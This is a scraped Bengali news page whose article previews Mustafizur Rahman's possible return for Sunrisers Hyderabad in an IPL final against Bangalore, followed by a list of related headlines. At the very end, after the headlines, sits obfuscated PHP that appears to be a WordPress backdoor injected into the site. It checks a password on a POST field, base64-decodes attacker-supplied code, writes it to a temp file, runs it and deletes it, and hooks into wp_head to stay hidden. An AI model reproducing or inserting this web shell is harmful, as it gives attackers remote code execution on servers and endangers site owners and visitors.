শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

মুস্তাফিজের দিকে তাকিয়ে থাকবে হায়দরাবাদ

 

 

স্পোর্টস ডেস্ক :ফাইনালে উঠার লড়াইয়ে গত শুক্রবার গুজরাট লায়ন্সের বিপক্ষে মাঠে নামা হয়নি কাটার মাস্টার মুস্তাফিজুর রহমানের। তারপরও অধিনায়ক ডেভিড ওয়ার্নারের অতিমানবীয় ইনিংসের কল্যাণে জয় সানরাইজার্স হায়দরাবাদ। আজ রবিবার রাতে ফাইনালে টুর্নামেন্টের সবচেয়ে শক্তিশালী দল রয়্যাল চ্যালেঞ্জার বেঙ্গালুরুর বিরুদ্ধে মুস্তাফিজের দিকেই তাকিয়ে থাকবে হায়দরাবাদ- এমনটায় মনে করছেন ভারতের জনপ্রিয় বাংলা দৈনিক আনন্দবাজার পত্রিকা।

Mustafizur+Rahman+of+Sunrisers+Hyderabad+celebrate+the+wicket+of+Shaun+Marsh+of+Kings+XI+Punjab

রবিবার প্রকাশিত তাদের এক প্রতিবেদনে পত্রিকাটি বলছে, ফাইনাল নিয়ে অবশ্য একটা জোরদার ধারণা রয়েছে যে বেঙ্গালুরুই ফেভারিট। টিমটা যে রকম তুখোড় ছন্দে রয়েছে, সেটা দেখে ধারণাটা ঠিক বলেই মনে হচ্ছে। মানতেই হবে, ওদের ব্যাটিংটা হায়দরাবাদের চেয়ে অনেক ভাল। ক্রিস গেইল, এবি ডি ভিলিয়ার্স, ওয়াটসন আর সবার উপরে বিরাট কোহালি। প্রত্যেকে রানের মধ্যে আছে। ফাইনালে বেঙ্গালুরুর হাসতে হাসতে মাঠ ছাড়ার জন্য এদের মধ্যে দু’একজনের ক্রিজে টিকে যাওয়াটাই সম্ভবত যথেষ্ট হবে।

অন্যদিকে, হায়দরাবাদের সবচেয়ে প্রভাবশালী দুই স্ট্রাইক বোলারকে ছাড়াই শেষের ম্যাচগুলো খেলতে বাধ্য হয়েছে। চোটের কারণে আশিস নেহরাকে হারানোটা যেন যথেষ্ট ছিল না, হ্যামস্ট্রিংয়ের চোটে গুজরাটের বিপক্ষে খেলতে পারল না মুস্তাফিজও। এই দু’জনকে না পাওয়া নিঃসন্দেহে হায়দরাবাদের কাছে বিশাল ধাক্কা। ভুবনেশ্বর কুমার, নেহরা আর মুস্তাফিজ— ত্রয়ীর পাশে স্রান, এই কম্বিনেশনে হায়দরাবাদ আক্রমণ এতটাই শক্তিশালী যে প্রতিপক্ষ জাঁকিয়ে বসার সুযোগই পায় না। কিন্তু এখন নেহরা নেই। এই অবস্থায় টুর্নামেন্টের সবচেয়ে গুরুত্বপূর্ণ ম্যাচে ওরা নিশ্চয়ই মুস্তাফিজুরের দিকে তাকিয়ে। তবে চোট সারিয়ে ও মাঠে নামতে পারে কি না, সেটা দেখার।

তবে, মুস্তাফিজ ভক্তদের প্রত্যাশা, আজ ফিরবেন মুস্তাফিজ। শুধু ফিরবেনই না, স্বরূপেই ফিরবেন, সঙ্গে প্রতিপক্ষের ব্যাটসম্যানদের আরও একবার বড় বাধা হয়ে দাঁড়াবেন কাটার মাস্টার।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}